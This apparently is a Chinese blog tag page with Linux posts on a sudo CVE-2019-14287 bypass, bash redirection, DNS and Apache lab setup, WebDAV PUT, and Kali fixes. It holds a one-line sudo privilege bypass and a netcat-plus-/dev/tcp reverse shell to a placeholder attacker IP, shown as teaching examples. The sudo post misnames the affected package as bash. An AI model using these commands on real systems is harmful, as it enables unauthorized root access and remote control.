Tag:linux

Tag (linux)'s result:

sudo漏洞可绕过sudoers安全配置并以root执行命令

0x00 概述 20191015 网上爆出sudo漏洞cve-2019-14287(苹果研究员joe vennix发现),即使在sudoers文件中配置了不允许以root执行某命令,但是攻击者可以利用#-1或#4294967295绕过安全配置,并以root执行某命令。 该漏洞影响bash<1.8.28   0x01 漏洞重现 sudo -u#-1 vim   0x02 漏洞分析 #-1(32位二进制数值溢出后被截断)或#4294967295(2的32次方-1)会被id转用户名的函数误认为 0。Root用户id为0,因此当 sudo 试图将用户 ID 修改成 -1时,不会发生任何变化。这就导致 sudo 日志条目将该命令报告为以用户 ID 为 4294967295而非 root (或者用户ID为 0)运行命令。 此外,由于通过–u 选项指定的用户 ID 并不存在于密码数据库中,因此不会运行任何 PAM 会话模块。如果sudoers 条目被写入允许用户以除 root 身份以外的用户身份运行命令,则可利用该 bug 绕过该限制。   0x03 结语 sudoers标准配置无安全问题,不用慌……  

linux bash >&总结

0x00 前言 经常接触到bash的>&符号,总是忘记或者混淆,特有此文总结。   0x01 概述 0:stdin标准输入 1:stdout标准输出 2:stderr标准错误 >:输出重定向 <:输入重定向 /dev/null:空洞,可以理解为黑洞或垃圾箱 直接ls > 1系统会误认为是把标准输出重定向到1这个文件而不是标准输出,所以加上&1表示标准输出。 标准错误2不仅显示错误信息,还有回显输入命令和终端提示符的作用。 >/dev/null 2>&1:把标准输出重定向到黑洞,接着标准错误重定向到标准输出,也就是扔到一样黑洞。 2>&1 >/dev/null:先把标准错误重定向到标准输出,注意这里标准输出还是默认输出到屏幕,所以会输出stderr,接着标准输出重定向到黑洞,所以输出stderr不输出stdout。   0x02 测试 测试0: redhat:cat hi.txt >/dev/null abcd >/dev/null 2>&1   测试1: kali: nc -vvlp 1234 redhat:bash -i >/dev/tcp/kaliIP/1234 解释:bash -i创建的交互式子shell的标准输出给了/dev/tcp/kaliIP/1234,所以在redhat中输入ls命令的输出结果在kali中显示,但是标准错误2还是在redhat中,所以输入abcd这个不存在的命令时标准错误显示在redhat中。   测试2: kali:nc -vvlp 1234 redhat:bash -i </dev/tcp/kaliIP/1234 解释:redhat从/dev/tcp/kaliIP/1234中获得标准输入0,将ls命令的结果显示出来。由于标准错误2还在redhat,所以在kali中输入abcd这个不存在的命令时,错误信息显示在redhat,注意这里命令虽然在kali中输入,但是命令也会回显到redhat,因为标准错误2还在redhat……貌似强调得有点多了^-^!。   测试3: kali:nc -vvlp 1234 redhat:bash -i >/dev/tcp/kaliIP/1234 0>&1 解释:在redhat中将标准输出1重定向到kali,标准输入0重定向到标准输出1,也就是在kali中输入命令ls,命令传到redhat的子shell,再将命令结果输出到kali,注意这里标准错误2在redhat,所以redhat有命令回显和标准错误(如图的abcd)。   测试4: kali:nc -vvlp 1234 redhat:bash -i >/dev/tcp/kaliIP/1234 0>&1 2>&1 解释:redhat中在测试3的基础上将标准错误也重定向到标准输出,这样在redhat中就没有了标准错误信息和命令回显(包括命令提示符),这就是一个基本的反弹shell了。 通过查阅资料https://www.gnu.org/software/bash/manual/bash.pdf 可以发现 There are two formats for redirecting standard output and standard error: &> word and >& word Of the two forms, the first is preferred. This is semantically equivalent to > word 2>&1 也就是说2>&1和>&/dev/…,&>/dev/…是一样的,亲测有效。   0x03 结语 多看看官方手册还是不错的。   0x04 参考资料 www.freebuf.com/articles/system/153986.html https://www.gnu.org/software/bash/manual/bash.pdf blog.csdn.net/yasi_xi/article/details/8637069 www.jb51.net/article/106373.htm  

redhat6配置dns服务器

具体步骤如下: etc/named.conf配置 // // named.conf // // Provided by Red Hat bind package to configure the ISC BIND named(8) DNS // server as a caching only nameserver (as a localhost DNS resolver only). // // See /usr/share/doc/bind*/sample/ for example named configuration files. //   options { listen-on port 53 { 10.0.165.253; }; listen-on-v6 port 53 { ::1; }; directory  “/var/named”; dump-file  “/var/named/data/cache_dump.db”; statistics-file “/var/named/data/named_stats.txt”; memstatistics-file “/var/named/data/named_mem_stats.txt”; allow-query     { localhost; }; recursion yes;   dnssec-enable yes; dnssec-validation yes; dnssec-lookaside auto;   /* Path to ISC DLV key */ bindkeys-file “/etc/named.iscdlv.key”;   managed-keys-directory “/var/named/dynamic”; };   logging { channel default_debug { file “data/named.run”; severity dynamic; }; };   zone “zhengxialsa.com” { type master; file “zhengxialsa.com”; };   zone “165.0.10.in-addr.arpa” { type master; file “165.0.10”; };   include “/etc/named.rfc1912.zones”; include “/etc/named.root.key”; 正向解析文件zhengxialsa.com配置 $TTL 86400 zhengxialsa.com.   IN     SOA       dns.zhengxialsa.com. root.zhengxialsa.com ( 20100820          ;serial 1H                ;refresh 15M               ;retry 1W                ;expire 1D)               ;minimun   zhengxialsa.com.   IN      NS         dns.zhengxialsa.com. dns                IN      A          10.0.165.253 lsa                IN      A          10.0.165.253 lsb                IN      A          10.0.165.253 lsc                IN      A          10.0.165.253 反向解析文件165.0.10配置 $TTL 86400 @       IN          SOA        165.0.10.in-addr.arpa.    root.zhengxialsa.com ( 20100820                  ;serial 1H                        ;refresh 15M                       ;retry 1W                        ;expire 1D)                       ;minimun   @       IN           NS         dns.zhengxialsa.com. 253     IN           PTR        dns.zhengxialsa.com. 253     IN           PTR        lsa.zhengxialsa.com. 253     IN           PTR        lsb.zhengxialsa.com. 253     IN           PTR        lsc.zhengxialsa.com. Resolve.conf配置 # Generated by NetworkManager nameserver 10.0.165.253   启动 service named start [root@localhost Desktop]# service named restart Stopping named: .                                          [  OK  ] Starting named:                                            [  OK  ]   测试 [root@localhost Desktop]# ping dns.zhengxialsa.com PING dns.zhengxialsa.com (10.0.165.253) 56(84) bytes of data. 64 bytes from lsa.zhengxialsa.com (10.0.165.253): icmp_seq=1 ttl=64 time=0.063 ms 64 bytes from lsa.zhengxialsa.com (10.0.165.253): icmp_seq=2 ttl=64 time=0.094 ms 64 bytes from lsa.zhengxialsa.com (10.0.165.253): icmp_seq=3 ttl=64 time=0.203 ms 64 bytes from lsa.zhengxialsa.com (10.0.165.253): icmp_seq=4 ttl=64 time=0.095 ms   [root@localhost Desktop]# ping lsc.zhengxialsa.com PING lsc.zhengxialsa.com (10.0.165.253) 56(84) bytes of data. 64 bytes from lsa.zhengxialsa.com (10.0.165.253): icmp_seq=1 ttl=64 time=0.044 ms 64 bytes from lsa.zhengxialsa.com (10.0.165.253): icmp_seq=2 ttl=64 time=0.094 ms 64 bytes from lsa.zhengxialsa.com (10.0.165.253): icmp_seq=3 ttl=64 time=0.095 ms 64 bytes from lsa.zhengxialsa.com (10.0.165.253): icmp_seq=4 ttl=64 time=0.094 ms ^C   [root@localhost Desktop]# ping lsa.zhengxialsa.com PING lsa.zhengxialsa.com (10.0.165.253) 56(84) bytes of data. 64 bytes from dns.zhengxialsa.com (10.0.165.253): icmp_seq=1 ttl=64 time=0.068 ms 64 bytes from dns.zhengxialsa.com (10.0.165.253): icmp_seq=2 ttl=64 time=0.095 ms 64 bytes from dns.zhengxialsa.com (10.0.165.253): icmp_seq=3 ttl=64 time=0.094 ms   [root@localhost Desktop]# ping lsb.zhengxialsa.com PING lsb.zhengxialsa.com (10.0.165.253) 56(84) bytes of data. 64 bytes from lsc.zhengxialsa.com (10.0.165.253): icmp_seq=1 ttl=64 time=0.089 ms 64 bytes from lsc.zhengxialsa.com (10.0.165.253): icmp_seq=2 ttl=64 time=0.081 ms 64 bytes from lsc.zhengxialsa.com (10.0.165.253): icmp_seq=3 ttl=64 time=0.084 ms 64 bytes from lsc.zhengxialsa.com (10.0.165.253): icmp_seq=4 ttl=64 time=0.095 ms 全部正常    

redhat下配置http服务器

0x00 概述 以前做的一个实验,完成了在redhat下配置http服务器,并实现改变端口,域名代替ip等操作,有需要的可以参考一下。   0x01 改变端口号 [root@mail Desktop]# service httpd status httpd (pid  4952) is running… 用ip直接访问网站,默认80端口 改变端口号,改成8888 80已经无法访问 成功访问 具体配置 [root@mail Desktop]# yum -y install policycoreutils-python yum whatprovides /usr/sbin/semanage or yum provides /usr/sbin/semanage [root@mail Desktop]# semanage port -l|grep http http_cache_port_t              tcp      3128, 8080, 8118, 8123, 10001-10010 http_cache_port_t              udp      3130 http_port_t                    tcp      80, 443, 488, 8008, 8009, 8443 pegasus_http_port_t            tcp      5988 pegasus_https_port_t           tcp      5989 没8888 [root@mail Desktop]# semanage port -a -t http_port_t -p tcp 8888 [root@mail Desktop]# semanage port -l|grep http http_cache_port_t              tcp      3128, 8080, 8118, 8123, 10001-10010 http_cache_port_t              udp      3130 http_port_t                    tcp      8888, 80, 443, 488, 8008, 8009, 8443 pegasus_http_port_t            tcp      5988 pegasus_https_port_t           tcp      5989 搞定!也可以使用关闭selinux来改变端口(不太安全)   0x02 域名代替ip 域名:www.gdhy.col 具体操作: 向正向解析文件加入一条A记录 $TTL 86400 gdhy.col.   IN     SOA       dns.gdhy.col.                      root.gdhy.col ( 20100820                    ;serial 1H                          ;refresh 15M                         ;retry 1W                          ;expire 1D)                         ;minimun   gdhy.col.   IN     NS                 dns.gdhy.col. dns                IN      A          10.0.165.253 @                  IN      MX         10          mail.gdhy.col. mail               IN      A          10.0.165.253 www                IN      A          10.0.165.253   修改httpd.conf的servername的值 # ServerName www.gdhy.col:8888 搞定!   0x03 配置虚拟主机 1. 基于ip 只有1个内网ip,算了 大概配置就这样: <VirtualHost 10.0.165.252:80> ServerAdmin webmaster@dummy-host.example.com DocumentRoot /var/www/html/vt1 DirectoryIndex index.html ServerName www.vvtt1.com ErrorLog logs/dummy-host.example.com-error_log CustomLog logs/dummy-host.example.com-access_log common </VirtualHost>   <VirtualHost 10.0.165.251:80> ServerAdmin webmaster@dummy-host.example.com DocumentRoot /var/www/html/vt2 DirectoryIndex index.html ServerName www.vvtt2.com ErrorLog logs/dummy-host.example.com-error_log CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> 2. 基于域名 通过www.vvtt1.com和www.vvtt2.com可以分别访问不同目录和主页 具体步骤: 配置正向解析文件,在named.comf加入这两个域zone $TTL 86400 vvtt2.com.   IN     SOA       dns.vvtt2.com.                      root.vvtt2.com ( 20100820                    ;serial 1H                          ;refresh 15M                         ;retry 1W                          ;expire 1D)                         ;minimun   vvtt2.com.   IN     NS                 dns.vvtt2.com. dns                IN      A          10.0.165.253 www                IN      A          10.0.165.253   $TTL 86400 vvtt1.com.   IN     SOA       dns.vvtt1.com.                      root.vvtt1.com ( 20100820                    ;serial 1H                          ;refresh 15M                         ;retry 1W                          ;expire 1D)                         ;minimun   vvtt1.com.   IN     NS                 dns.vvtt1.com. dns                IN      A          10.0.165.253 www                IN      A          10.0.165.253   // // named.conf // // Provided by Red Hat bind package to configure the ISC BIND named(8) DNS // server as a caching only nameserver (as a localhost DNS resolver only). // // See /usr/share/doc/bind*/sample/ for example named configuration files. //   options { listen-on port 53 { any; }; listen-on-v6 port 53 { ::1; }; directory  “/var/named”; dump-file  “/var/named/data/cache_dump.db”; statistics-file “/var/named/data/named_stats.txt”; memstatistics-file “/var/named/data/named_mem_stats.txt”; allow-query     { 0.0.0.0/0; }; recursion yes;   dnssec-enable yes; dnssec-validation yes; dnssec-lookaside auto;   /* Path to ISC DLV key */ bindkeys-file “/etc/named.iscdlv.key”;   managed-keys-directory “/var/named/dynamic”; };   logging { channel default_debug { file “data/named.run”; severity dynamic; }; };   zone “gdhy.col” { type master; file “gdhy.col”; };   zone “165.0.10.in-addr.arpa” { type master; file “165.0.10”; };   zone “vvtt1.com” { type master; file “vvtt1.com”; };   zone “vvtt2.com” { type master; file “vvtt2.com”; };   include “/etc/named.rfc1912.zones”; include “/etc/named.root.key”;   httpd.conf: NameVirtualHost 10.0.165.253……

win格式文本转linux格式的方法总结

0x00 概述 这是一个小坑,由于windows和linux换行符不同,导致win文本在linux下打开出现^M或者乱码,甚至在进行某些爆破(wifi)的时候总失败,反之亦然。这就是不同系统换行符问题导致的,win-\r\n(CRLF/0D0A),Unix-\n(LF/0A),macos-\r(CR/0D)。这时候就要进行格式转换。   0x01 转换方法 这里只讨论windows下文本文件转linux格式。 sed -e ‘s/.$//’ mywin.txt > mylinux.txt unix2dos mywin.txt vi/vim::%s/^M$//g(^M要输入ctrl+v和ctrl+M) 还是vi/vim :set fileformat=unix :w tr 本人测试过1,2成功,3,4,5相对比较麻烦就没测了,还有很多其他方法,大同小异,就是转格式,去\r。   0x02 结语 happy National Day and Mid-Autumn festival!  

apache开启对put请求的支持

0x00 前言: 最近整理了一下各种http请求,发现xampp里apache默认没支持put请求,所以有此文记录配置apache开启对put请求的支持。 0x01 环境: win7+xampp 0x02 步骤: 1.在httpd.conf中把下面两行的注释去掉(先看看有没有这两个模块,应该有的) LoadModule dav_module modules/mod_dav.so LoadModule dav_fs_module modules/mod_dav_fs.so 2.修改httpd.conf某段如下 DocumentRoot “C:/xampp/htdocs” <Directory “C:/xampp/htdocs”> # # Possible values for the Options directive are “None”, “All”, # or any combination of: #   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that “MultiViews” must be named *explicitly* — “Options All” # doesn’t give it to you. # # The Options directive is both complicated and important.  Please see # http://httpd.apache.org/docs/2.4/mod/core.html#options # for more information. # Options Indexes FollowSymLinks Includes ExecCGI# # AllowOverride controls what directives may be placed in .htaccess files. # It can be “All”, “None”, or any combination of the keywords: #   AllowOverride FileInfo AuthConfig Limit # #AllowOverride All# # Controls who can get stuff from this server. # Require all granted Dav On AllowOverride None Options All Order allow,deny Allow from all </Directory> 3.解决webdav锁的问题 新建文件DavLock,在httpd.conf中新增一行如下(路径写对应的DavLock文件所在路径) DavLockDB  C:/xampp/htdocs/DavLock 0x03 效果: target url: 192.168.0.101 http method: put upload file name: 111.png local file path: /root/Pictures/1.png <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”> <html><head> <title>201 Created</title>……

kali linux安装配置jpcap

由于要用到第三方包jpcap,配置过程记录如下: 具体步骤: 1.下载jpcap git clone –recursive https://github.com/mgodave/Jpcap.git 2.编译 进入Jpcap/src/main/c,执行make,可能会遇到一些问题,请参考linux一些问题整理(持续更新) 3.复制libjpcap.so到目录:$JAVA_HOME/jre/lib/<arch>目录中。其中,arch对应的是计算机架构,如i386、sparc、amd64等等。而$JAVA_HOME对于Debian系列的Linux,一般指/usr/lib/jvm/default-java目录。(如果你更改了java_home,请进入到你更改的那个java_home路径) 4.复制Jpcap/lib/jpcap.jar拷贝到$JAVA_HOME/lib/目录下(如果你更改了java_home,请进入到你更改的那个java_home路径),并在java_home / j re /lib / ext /目录下也复制一份。 如无意外,就可以成功运行引用了jpcap包的程序了。 参考链接: http://blog.csdn.net/pdcxs007/article/details/48691009 http://blog.csdn.net/lastsweetop/article/details/4130626

(转)kali安装java1.8

原文地址:http://www.mamicode.com/info-detail-1588165.html 0x01 下载 首先,去官方网站下载JDK1.8对应的版本 http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html 我的kali安装的是32位的 所以我下载 JDK1.8 32位  的版本,下载速度很慢,你可以使用其他服务器中转或离线下载来提高下载效率。 请根据自己的系统自行选择版本。   0x02 预准备工作 kali自带的java是openjdk,如果需要写安卓或者开发其他程序,则需要换成Oracle的jdk 首先卸载自带的openjdk(根据系统所自带的具体jdk版本好来修改下面即将卸载的程序名) sudo apt-get remove openjdk-7-jdk 网上有说法使用 apt-get purge 把所有的jdk附属配置全都卸载完了,一般情况下,remove就足够了   0x03 安装 接下来安装Oracle JDK,解压下载好的JDK包,并进入 tar zxvf jdk-8u112-linux-i586.tar.gz 此时解压出来文件夹名为  jdk1.8.0_112  (这里根据你下载的版本不同 文件名也不同 但是只是修改了版本号 都是jdk1.x.x_xxx的格式) 开始拷贝目录 手动安装 (注意红色加粗区域的文件夹名根据自己的实际情况来设定,不要无脑搬代码) sudo mkdir -p /usr/local/java cp -r jdk1.8.0_112/ /usr/local/java/ 接下来配置JDK的环境变量 sudo gedit /etc/profile 复制以下内容追加到文件末尾(注意红色加粗区域的文件夹名根据自己的实际情况来设定,不要无脑搬代码) JAVA_HOME=/usr/local/java/jdk1.8.0_112 PATH=$PATH:$HOME/bin:$JAVA_HOME/bin export JAVA_HOME export PATH 告诉系统JDK的位置,最后2行代码不是重复,是要执行2次  (注意红色加粗区域的文件夹名根据自己的实际情况来设定,不要无脑搬代码) sudo update-alternatives –install “/usr/bin/java” “java” “/usr/local/java/jdk1.8.0_112/bin/java” 1 sudo update-alternatives –install “/usr/bin/javac” “javac” “/usr/local/java/jdk1.8.0_112/bin/javac” 1 sudo update-alternatives –install “/usr/bin/javaws” “javaws” “/usr/local/java/jdk1.8.0_112/bin/javaws” 1 sudo update-alternatives –install “/usr/bin/javaws” “javaws” “/usr/local/java/jdk1.8.0_112/bin/javaws” 1 设置新的JDK为默认,代码也是执行2次(注意红色加粗区域的文件夹名根据自己的实际情况来设定,不要无脑搬代码) sudo update-alternatives –set java /usr/local/java/jdk1.8.0_112/bin/java sudo update-alternatives –set java /usr/local/java/jdk1.8.0_112/bin/java sudo update-alternatives –set javac /usr/local/java/jdk1.8.0_112/bin/javac sudo update-alternatives –set javac /usr/local/java/jdk1.8.0_112/bin/javac sudo update-alternatives –set javaws /usr/local/java/jdk1.8.0_112/bin/javaws sudo update-alternatives –set javaws /usr/local/java/jdk1.8.0_112/bin/javaws 重载Profile文件 source /etc/profile   0x04  测试 输入命令查看Java版本号 java -version 返回 root@kali:~# java -version java version “1.8.0_112” Java(TM) SE Runtime Environment (build 1.8.0_112-b15) Java HotSpot(TM) Server VM (build 25.112-b15, mixed mode) 好了,至此,安装成功 ! ========================================================== //经LSA亲测可以成功安装!

(转)Kali Linux add PPA repository add-apt-repository

原文地址:https://www.blackmoreops.com/2014/02/21/kali-linux-add-ppa-repository-add-apt-repository/ A Personal Package Archive (PPA) is a special software repository for uploading source packages to be built and published as an APT repository by Launchpad or a similar application. While the term is used exclusively within Ubuntu, Launchpad host Canonical envisions adoption beyond the Ubuntu community. Debian allows users to add and use PPA repositories by an application named add-apt-repository however, Kali Linux didn’t include this in their default package list. With Kali, because this is a special purpose application and certain modifications were made to make it work for what it does best (Penetration Test), there’s a chance that by adding untested and unsupported PPA repositories and application you might end up breaking your installation. However, PPA is a powerful tool to have and a lot of the specific applications that are not available in repositories are available via PPA repositories. Users should take extra care before adding unknown and random repositories as it might very well break other things. I mean, how do you know the PPA……

linux一些问题整理(持续更新)

1. kali upgrade后桌面全蓝,图片无法显示 原因:在安装更新过程中被迫中断,导致系统故障 解决:进入Advanced options for kali gun/linux[recovery mode],执行dpkg –configure -a从故障发生时执行的命令继续执行。 ******************************************** 2. apt-get install xxx结果显示 原因:包太旧或者没有这个包 解决:加入源再apt-get update,apt-get upgrade。 ******************************************** 3. redhat启动apache出现httpd: apr_sockaddr_info_get() failed for hostname httpd: Could not reliably determine the server’s fully qualified domain name, using 127.0.0.1 for ServerName 原因:没有在 /etc/httpd/conf/httpd.conf 中设定 ServerName。所以apache会用主机上的名称来取代,首先会去找 /etc/hosts 中有没有主机的定义。 解决: 方案1:设定httpd.conf文件中的 ServerName,如下:ServerName localhost:80 方案2:在 /etc/hosts 中填入自己的主机名称 hostname,如下:127.0.0.1 hostname。 ********************************************* 4. kali编译jpcap出现fatal error: jni.h: No such file or directory 错误 原因:可能没有安装jdk或者Jpcap里makefile里面的java_dir路径不正确 解决:安装jdk,并将Jpcap里makefile的java_dir路径改成java_home的路径 ********************************************* 5. kali编译jpcap出现fatal error: pcap.h: No such file or directory错误 原因:没有安装libpcap-dev 解决:apt-get install libpacp-dev ********************************************* 6. kali安装完输入密码后无法进入桌面,显示花屏或黑屏无响应 原因:电脑双显卡与kali预装的开源显卡驱动nouveau的问题 解决:启动按e,在倒数第三行quite后加入了nouveau.modeset=0。接着ctrl+x。 进入后再将nouveau添加到黑名单,防止它启动 $ cd /etc/modprobe.d $ sudo vi nvidia-graphics-drivers.conf 写入:blacklist nouveau 最后编辑/etc/default/grub,在末尾添加 rdblacklist=nouveau nouveau.modeset=0 ********************************************* 7. kali 安装后无法启动wifi 原因:缺少驱动/固件,或相关限制 解决:具体情况(如无线网卡型号)具体分析,根据提示或报错信息到搜索引擎查找解决方案,参考命令: 检查命令 sudo rfkill list all sudo dmesg | grep xxx lspci lsusb dmesg 相关命令 sudo modprobe -r ideapad_laptop vim /etc/modprobe.d/ideapad.conf写入blacklist ideapad_laptop sudo modprobe -r acer-wmi etc/modprobe.d/blacklist.conf 在末尾加入blacklist acer-wmi sudo apt-get install firmware-xxx sudo apt-get install linux-firmwareecho “options ath10k_core skip_otp=y” | sudo tee /etc/modprobe.d/ath10k_core.conf service network-manager restart   相关工具 https://www.kernel.org/pub/linux/kernel/projects/backports/2015/11/20/backports-20151120.tar.gz https://github.com/kvalo/ath10k-firmware https://github.com/ajaybhatia/Qualcomm-Atheros-QCA9377-Wifi-Linux https://github.com/atondwal/ath10k-firmware   ****************************************** linux terminal use proxy: .bashrc: alias setsocks5proxy=”export……